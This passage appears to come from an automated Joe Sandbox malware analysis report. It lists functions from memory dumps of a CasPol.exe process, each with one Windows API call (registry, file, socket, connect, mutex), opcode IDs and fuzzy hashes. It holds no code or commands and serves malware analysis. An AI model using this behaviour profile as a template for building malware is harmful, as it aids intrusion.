                                  • Instruction Fuzzy Hash: 4E219D72900304AFE7219B65DC85FAAFBECEF54210F04895AED85DB241D674E5098BB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E12E2 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 010E136D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileMappingOpen
                                  • String ID:
                                  • API String ID: 1680863896-0
                                  • Opcode ID: 78afd96714beca65444efaff27c190aa60dcfdbd3f85ad6122c7519867c31c20
                                  • Instruction ID: cc20ebddbf42de040e07eea0ad0883fe5ed5ea0de38cd92ae567e627c2a3abae
                                  • Opcode Fuzzy Hash: 78afd96714beca65444efaff27c190aa60dcfdbd3f85ad6122c7519867c31c20
                                  • Instruction Fuzzy Hash: 892191B1509380AFE721CB25CC45F66FFE8EF05210F08849EE9848B252D375A908C766
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA722 Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 1D5FA7BE
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: cd4b3d85af3d7cf5bbd4b23fcd4d06d4fa2e11983c877729e49e2f176c080f21
                                  • Instruction ID: f649d389153875bd847d7a23ef3ab29d7bbea2ab7d31ec718fa03d560c8b86df
                                  • Opcode Fuzzy Hash: cd4b3d85af3d7cf5bbd4b23fcd4d06d4fa2e11983c877729e49e2f176c080f21
                                  • Instruction Fuzzy Hash: 5321C8755093C06FD3138B25CC51B62BFB8EF87610F0981CFE8848B693D2656919D7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E0900 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileType.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E0995
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
                                  • Opcode ID: 7d7b36e9d1895a53317ab0164a44d41e888d2ac7fd2871ad16620c77c67ce06c
                                  • Instruction ID: 83b95730250cdc0abe43372e07e649a89186b7fd031caf0cc53df56efc08d0a8
                                  • Opcode Fuzzy Hash: 7d7b36e9d1895a53317ab0164a44d41e888d2ac7fd2871ad16620c77c67ce06c
                                  • Instruction Fuzzy Hash: 1E21F8B59087806FE3128B25DC85BA2FFB8EF47720F0881DAE9C48B153D2646909C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E01A4 Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EA4), ref: 010E023F
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: b9016b220b9016a860afaff25702b3c83faf355a8d71770e5d6877b7163a2fef
                                  • Instruction ID: e8e34f71763a5a0913e2adc401104dd2dfb3b8fd6cfed50849ed885b72ca59ae
                                  • Opcode Fuzzy Hash: b9016b220b9016a860afaff25702b3c83faf355a8d71770e5d6877b7163a2fef
                                  • Instruction Fuzzy Hash: C721C8715093806FE7228B15DC85BA2FFF8DF46720F1880DAF9849F193C2A96949CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E082A Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 010E08A9
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: e0bddba24bec4e43341ce64aabd76616f56e9e4781c154c2fd4e129efb6409eb
                                  • Instruction ID: c5cc6c8ff678c53c74ee50b03c51e8b71b07357d5dbebc15ca3df8eaca765ead
                                  • Opcode Fuzzy Hash: e0bddba24bec4e43341ce64aabd76616f56e9e4781c154c2fd4e129efb6409eb
                                  • Instruction Fuzzy Hash: A2217F71A00704AFF721CF66DD89B66FBE8EF04210F1884A9E9858A256D7B1E504CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA54A Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1D5FA5C9
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 2b0c6c6e6e50049c6f29c3aa0c02f8eb871b15dab71f3d6d4ab30e2ed2be539c
                                  • Instruction ID: 2156def7e22b60e17521b5d729a6601adce68dbd7643d39716dc280f3a2831f9
                                  • Opcode Fuzzy Hash: 2b0c6c6e6e50049c6f29c3aa0c02f8eb871b15dab71f3d6d4ab30e2ed2be539c
                                  • Instruction Fuzzy Hash: C921AEB2900704AFF7219B25DC85F6BFBECEF18620F04895AFD458B241D664E5498BB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E29B6 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetAdaptersAddresses.IPHLPAPI(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E2A45
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: AdaptersAddresses
                                  • String ID:
                                  • API String ID: 2506852604-0
                                  • Opcode ID: b9a673a0560ea4d4bd01f078ec1b9f5655413f3f57695261b126be5476e3b9c8
                                  • Instruction ID: 9ffcf78bd32f10fde5c841720d8cf8e7e5e4ee52f7126d7cc481163710ec8ca8
                                  • Opcode Fuzzy Hash: b9a673a0560ea4d4bd01f078ec1b9f5655413f3f57695261b126be5476e3b9c8
                                  • Instruction Fuzzy Hash: 7F21AA71409780AFE7228B11DC85F56FFB8EF46310F0885DBE9859F153D265A509C772
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1C06 Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAEventSelect.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1C8A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: EventSelect
                                  • String ID:
                                  • API String ID: 31538577-0
                                  • Opcode ID: cde412176d22120903dade5c3345c0fd09a427f6f09a5cb2ebb788e5ad20c5b6
                                  • Instruction ID: cfdc27a7c2f498fcbc92ce008be7f722071313108f5adef93bbfcd89458f8ec7
                                  • Opcode Fuzzy Hash: cde412176d22120903dade5c3345c0fd09a427f6f09a5cb2ebb788e5ad20c5b6
                                  • Instruction Fuzzy Hash: 0A217FB2408344AFE722CB51DC84F96FBE8EF45220F08849BE984DB152D279A509CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E463E Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E46B2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 21893c393abc5ad6712d60670b900fb7fb7b34d27b7217d1752b3ab1a669b9da
                                  • Instruction ID: c5441681a5c9ec9b717147dd99cc5f454d62df807d829adfe239df2eadb158f3
                                  • Opcode Fuzzy Hash: 21893c393abc5ad6712d60670b900fb7fb7b34d27b7217d1752b3ab1a669b9da
                                  • Instruction Fuzzy Hash: B021A172900704EFF7218F55DC89F6AFBE8EF48220F14845AED85DA241D675E4098B72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E0AB2 Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadFile.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E0B31
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 7e54581e8a066f193efbd4ac493219a51488cfeae8eb38ba83935331089b36b3
                                  • Instruction ID: 381c9df0ad093a57738f0c82ccdcf00eaba65f4447a11c6b962fcbdd24f4f683
                                  • Opcode Fuzzy Hash: 7e54581e8a066f193efbd4ac493219a51488cfeae8eb38ba83935331089b36b3
                                  • Instruction Fuzzy Hash: 5221A172504340AFEB228F51DC84FA7FFE8EF45720F08859AF9849B152C275A909CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E20C6 Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E213A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 1f168e8271771153249bda42d12f2c385d7ebc2c498a3013a004789a9fab245d
                                  • Instruction ID: 5265f7f55ca492c29ae236284ed462ff56f88a6b15542699f25e516c3c763f17
                                  • Opcode Fuzzy Hash: 1f168e8271771153249bda42d12f2c385d7ebc2c498a3013a004789a9fab245d
                                  • Instruction Fuzzy Hash: 3921D172900304AFF7218F15DC85F6AFBECEF54310F04849AEE849A241D274E5058BB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FAFB8 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetExitCodeProcess.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FB030
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: CodeExitProcess
                                  • String ID:
                                  • API String ID: 3861947596-0
                                  • Opcode ID: 9056d04aead83e103abe3002da9aefda3dc51da4b3456e6f60a3f394bf8db2c2
                                  • Instruction ID: 7fb7a3d8e8cd4d65cc257e9cbe0ec5169b5a33b90f19fbef144a78ca2935794d
                                  • Opcode Fuzzy Hash: 9056d04aead83e103abe3002da9aefda3dc51da4b3456e6f60a3f394bf8db2c2
                                  • Instruction Fuzzy Hash: 7021D571509380AFE711CB11DC85F56FFBCDF46220F1884ABE944DF192C269A909C772
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E253A Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetNetworkParams.IPHLPAPI(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E25C4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: NetworkParams
                                  • String ID:
                                  • API String ID: 2134775280-0
                                  • Opcode ID: acd01740170b849e93f239499a704abe6e214e4103c99095326066e6b73cc7c8
                                  • Instruction ID: 8e62c743ce43b108520f3970109b1e78566a3111344bb8da2b8637e431e186f8
                                  • Opcode Fuzzy Hash: acd01740170b849e93f239499a704abe6e214e4103c99095326066e6b73cc7c8
                                  • Instruction Fuzzy Hash: C321D7714093806FE7228B11CC94B56FFB8EF47220F0880DBE9848F193C268A809C772
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E384A Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E38D2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChainPolicyVerify
                                  • String ID:
                                  • API String ID: 3930008701-0
                                  • Opcode ID: 73d3980f7506db3ca6a70e96e00e60b1bc1135c9bda906a3d4fd01b394fc250e
                                  • Instruction ID: a9b3ba76ab771bfe5ad25a6e01d238babd2a8c1469f7dfc2ab0bf28a6aeaf234
                                  • Opcode Fuzzy Hash: 73d3980f7506db3ca6a70e96e00e60b1bc1135c9bda906a3d4fd01b394fc250e
                                  • Instruction Fuzzy Hash: D0218071409380AFE7228B15DC88F66FFB8EF46210F08859AED849F153C369A509CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1A46 Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAIoctl.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1AC1
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Ioctl
                                  • String ID:
                                  • API String ID: 3041054344-0
                                  • Opcode ID: 552592e47cdb85cce0b45418e11690d5140b552dfedf67fe0a4a0ebaea258c97
                                  • Instruction ID: b645f273ed05e256a2a7f6c0c5c9eb3e77dc6f1456a35bd3471c255b3cf6f619
                                  • Opcode Fuzzy Hash: 552592e47cdb85cce0b45418e11690d5140b552dfedf67fe0a4a0ebaea258c97
                                  • Instruction Fuzzy Hash: 67218E71900600AFEB21CF16DC84F66FBE8EF48710F08859AED858B251D375E445DB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E16A6 Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 010E1719
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 33a88f42189d55d92d3534b90169bb7895e1bbd38c128430e86f45e55d389ee5
                                  • Instruction ID: 57b0d1fae5dbb103bda079a11e96b4640de7f947d4bd45b6b4694539ea192194
                                  • Opcode Fuzzy Hash: 33a88f42189d55d92d3534b90169bb7895e1bbd38c128430e86f45e55d389ee5
                                  • Instruction Fuzzy Hash: 5D21B371900300AFF720CF29DD89B66FBE8EF04610F1884AAED848B241D671E504CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1CD4 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                  • RasConnectionNotificationW.RASAPI32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1D63
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ConnectionNotification
                                  • String ID:
                                  • API String ID: 1402429939-0
                                  • Opcode ID: bef9a481e9cf0f022f666995bd3140f97c40002e4356e248f67cca99e53ef96e
                                  • Instruction ID: c3eea3580fe3094f71674b1d1672d06ecebd4ee40cb27b7eda5069acc6e5fb53
                                  • Opcode Fuzzy Hash: bef9a481e9cf0f022f666995bd3140f97c40002e4356e248f67cca99e53ef96e
                                  • Instruction Fuzzy Hash: 6721D7714097846FE7228B11DC85F66FFB8EF46314F0884DBE9849B153D275A508C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA652 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FA6CC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: d498dbe77f6c5a8d96fb0a177d5449bec07ebd072b15ce029ca966785638e44c
                                  • Instruction ID: c43a73bdaca9e0ceae19f4e4c4f66834ddc908894391d93ef2251262bc715b48
                                  • Opcode Fuzzy Hash: d498dbe77f6c5a8d96fb0a177d5449bec07ebd072b15ce029ca966785638e44c
                                  • Instruction Fuzzy Hash: 60218C72A00700AFE721CF15CC85F67F7E8EF08620F14885AE9498B251D664E809CA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E474A Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E47BC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 8d51261272537b2710832b633be6329e009a4f35e93320e221385b7012c1e187
                                  • Instruction ID: 39ae73a6c7850d3a02fb9c2b1151ab44b099bcaf8497fa2d2cacd4eb1e3c784c
                                  • Opcode Fuzzy Hash: 8d51261272537b2710832b633be6329e009a4f35e93320e221385b7012c1e187
                                  • Instruction Fuzzy Hash: 20218E71900600AFE721CF16DC88F66FBE8EF45610F14849AED85DB251D675E409CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1947 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  • ioctlsocket.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E19C3
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ioctlsocket
                                  • String ID:
                                  • API String ID: 3577187118-0
                                  • Opcode ID: 0792038c7aee3773feef5538f0766e57ba0c2145982e28bc66c4dbe77da4d374
                                  • Instruction ID: 4b499f70acddfeef5e4d7fa48bcdbf459738ece9cefbeed2d42cbdbf639981cc
                                  • Opcode Fuzzy Hash: 0792038c7aee3773feef5538f0766e57ba0c2145982e28bc66c4dbe77da4d374
                                  • Instruction Fuzzy Hash: 8F218172509384AFE722CF15DC85F66FFB8EF46210F08859AE9849F152C275A509C762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E2A82 Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 010E2B06
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Connect
                                  • String ID:
                                  • API String ID: 3144859779-0
                                  • Opcode ID: 5683514032b60cf6d76de80d2e5d7e37b75d011199bc0101f3053d01be13ca24
                                  • Instruction ID: 15f3574768e03231ad4284cbb13cef49502c51e88ea51a6d27f3e9c36aaf54b9
                                  • Opcode Fuzzy Hash: 5683514032b60cf6d76de80d2e5d7e37b75d011199bc0101f3053d01be13ca24
                                  • Instruction Fuzzy Hash: 44217C754093809FDB228F65D884A92BFF4EF06210F0984DAE9858B163D265A819DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FAB4C Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FABB8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 5c472719ed699ca834ee179418b28ebd2db645f6937c506ebecabf7f46aa1c8b
                                  • Instruction ID: b368921347d95d1aa22cc8243490e75020cf91ba66b04f826acc8fa1a5640f25
                                  • Opcode Fuzzy Hash: 5c472719ed699ca834ee179418b28ebd2db645f6937c506ebecabf7f46aa1c8b
                                  • Instruction Fuzzy Hash: 47218E725093C05FDB028B25DC95B92BFA4AF47224F0D84DAEC858F663D265A908DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E1302 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 010E136D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileMappingOpen
                                  • String ID:
                                  • API String ID: 1680863896-0
                                  • Opcode ID: ac7b3eb5a0ac48d7782d28ba4f9d24615d219fa39c7658371c11725ae1d38338
                                  • Instruction ID: 8b9c7319771927f595bb3607be017330efc59f7bddc39c45f8401c9a8e27ba5c
                                  • Opcode Fuzzy Hash: ac7b3eb5a0ac48d7782d28ba4f9d24615d219fa39c7658371c11725ae1d38338
                                  • Instruction Fuzzy Hash: 8D21A1B1904240AFF721CF25CD89F66FBE8EF04310F1884AAED848B642D775E404CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E0E0F Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 010E0E8C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID:
                                  • API String ID: 3981526788-0
                                  • Opcode ID: c34bc31e275b38cc63efd7a8caea3b4334f5fc2ee21b7bb0e5d35b8abdd551e5
                                  • Instruction ID: 7c07e655defdff0e8ec0c1a4698925d39266d493e3fc1580a6ca9525cc55ef91
                                  • Opcode Fuzzy Hash: c34bc31e275b38cc63efd7a8caea3b4334f5fc2ee21b7bb0e5d35b8abdd551e5
                                  • Instruction Fuzzy Hash: D0217C324093C09FD7128F65D844A92BFB0EF07220F0985DAE8C48F163C2759849DBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FAE12 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  • K32GetModuleInformation.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FAE76
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  • Opcode ID: f8c3ea24c53072d736195e1e7e5fe42246527ce279da5c3d814913d3f382d3d4
                                  • Instruction ID: 8e17b6b0fb67c45435f3fb043537ffe0b64dbbd10ba9d71c3c5746c72f21bb55
                                  • Opcode Fuzzy Hash: f8c3ea24c53072d736195e1e7e5fe42246527ce279da5c3d814913d3f382d3d4
                                  • Instruction Fuzzy Hash: D8119D71900600AFE721CB15DC85F67B7A8EF44610F14886AE948CB251D674E8098A62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA309 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(?,C151FFB0,00000000,?,?,?,?,?,?,?,?,73343C68), ref: 1D5FA378
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 7ddbda315e750bbdd3bf19d1c641c8aec5bcdb6aed47e6aba839a9492f52d3d2
                                  • Instruction ID: 76fca041a19ee4f9e5ed4ad3cb9e46b4e303210d12f2e1b30edf5eeb1d1893c6
                                  • Opcode Fuzzy Hash: 7ddbda315e750bbdd3bf19d1c641c8aec5bcdb6aed47e6aba839a9492f52d3d2
                                  • Instruction Fuzzy Hash: A621A5715093C09FD7068B25DC95752BFB4EF43260F0984DBDC858F6A3D275A809DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E0D4A Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 010E0DB6
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Socket
